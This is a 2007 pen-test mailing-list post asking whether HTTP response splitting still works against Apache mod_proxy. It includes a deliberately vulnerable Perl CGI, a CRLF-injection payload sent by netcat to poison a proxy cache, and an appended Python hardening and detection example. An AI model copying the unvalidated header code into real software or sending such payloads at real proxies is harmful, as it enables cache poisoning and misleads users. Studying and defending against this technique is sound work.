Network Security Pen-Test

Http splitting working example

Subject: Http splitting working example
Date: Thu, 29 Nov 2007 17:53:02 +0200
Hi list.

Hope somebody will spend some time on my question :),
or point me to the right list.

Does http splitting still work in fresh versions of common applications
(squid, apache)?

I've written a sample application (cgi script) vulnerable to it; however,
apache mod_proxy just ignores the answer and initiates a new
connection for each request.

Chain:

Client (netcat) -> Apache(mod_proxy) -> Apache -> vulnerable cgi.
Proxy is on localhost.
Goal: poison mod_proxy's cache
The cgi is:

#!/usr/bin/perl
use CGI qw(:standard);
# Deliberately vulnerable: the decoded 'name' parameter is written into the
# Location header unvalidated, so CR/LF in it ends the header block early.
print "Status: 302 Moved\nLocation: ".param('name')."\n\n";

The attempt to exploit is:

#nc localhost 80
GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0a%0aContent-Length:%2020%0d%0a%0d%0a<html>Gotcha!</html> HTTP/1.1
Host: test.xxx

HTTP/1.1 302 Moved
Date: Thu, xx Nov 2007 xx:25:03 GMT
Server: Apache/2.0.xx (Unix) mod_ssl/2.0.xx OpenSSL/xxx DAV/2
Location: Foo
Content-Length: 0
Content-Type: text/plain
Via: 1.1 client.xxx (Apache/2.xx)

GET http://test.xxx/1.html HTTP/1.1
Host: test.xxx

HTTP/1.1 200 OK
Date: Thu, xx Nov 2007 15:25:09 GMT
Server: Apache/2.xx (Unix) mod_ssl/2.xx OpenSSL/0.xx DAV/2
Last-Modified: Thu, xx Nov 2007 xxx GMT
ETag: "2c8be-2-c4f7b640"
Accept-Ranges: bytes
Content-Length: 2
Content-Type: text/html


1

However, as I've found, mod_proxy initiates a new connection for the
second GET. That breaks the whole idea of exploiting http splitting. Is
it some kind of new protection feature in apache mod_cache?
Please, could anybody provide a brief description of common
applications on which the attack is working? It seems vendors have done a
great job (like filtering characters in PHP header, or Tomcat).

-- 
Best regards.
Gleb Pakharenko.
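As an added example (not part of Gleb's post, nor of the CGI script he describes), written in Python rather than Perl: the hardened counterpart of the one-line CGI, which refuses to emit a Location header whose value contains CR or LF, together with a detection check that flags request lines whose percent-decoded query parameters carry those bytes. The function names and the sample request lines are constructed for this example; the first request line only mirrors the shape of the payload quoted above.

```python
import re
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, urlsplit

# RFC 7230 forbids bare CR and LF inside a header field value; any such byte
# in attacker-controlled data is what lets one response be read as two.
CRLF_RE = re.compile(r"[\r\n]")


def is_safe_header_value(value: str) -> bool:
    """True when the value can be emitted as a header without ending the header block."""
    return CRLF_RE.search(value) is None


def build_redirect(location: str) -> Optional[str]:
    """Hardened counterpart of the CGI's print statement (hypothetical helper).

    Returns the CGI response head for a 302 to `location`, or None when the
    value carries CR/LF. Rejecting rather than stripping keeps the audit
    trail: the caller can log the refused value as an injection attempt.
    """
    if not is_safe_header_value(location):
        return None
    return f"Status: 302 Moved\r\nLocation: {location}\r\n\r\n"


def query_values(request_target: str) -> Iterable[str]:
    """Yield every percent-decoded query parameter value of a request target."""
    query = urlsplit(request_target).query
    for values in parse_qs(query, keep_blank_values=True).values():
        yield from values


def has_header_injection(request_target: str) -> bool:
    """Detection side: does any decoded query parameter contain CR or LF?"""
    return any(not is_safe_header_value(v) for v in query_values(request_target))


# Constructed request lines: the first has the shape of the post's payload
# (%0d%0a sequences inside the `name` parameter), the other two are benign.
SAMPLE_REQUEST_LINES: List[str] = [
    "GET http://test.xxx/cgi-bin/1.pl?name=Foo%0d%0aConnection:%20Keep-Alive"
    "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK HTTP/1.1",
    "GET http://test.xxx/cgi-bin/1.pl?name=http://test.xxx/1.html HTTP/1.1",
    "GET http://test.xxx/1.html HTTP/1.1",
]


def flag_requests(lines: Iterable[str]) -> List[str]:
    """Return the request lines whose target carries a header-injection attempt."""
    flagged = []
    for line in lines:
        parts = line.split(" ")
        if len(parts) < 2:
            continue  # not a request line; skip
        if has_header_injection(parts[1]):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    for line in flag_requests(SAMPLE_REQUEST_LINES):
        print("header injection attempt:", line)
    print(repr(build_redirect("http://test.xxx/1.html")))
    print(repr(build_redirect("Foo\r\nX-Injected: 1")))
```

Two design points: the check must run at the same decoding depth the application uses (parse_qs decodes once, as CGI.pm does for param()), so that the value inspected is the value that would reach the header; and a redirect target should additionally be checked against an allowlist of permitted hosts, which closes the open-redirect case that CR/LF filtering alone does not.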

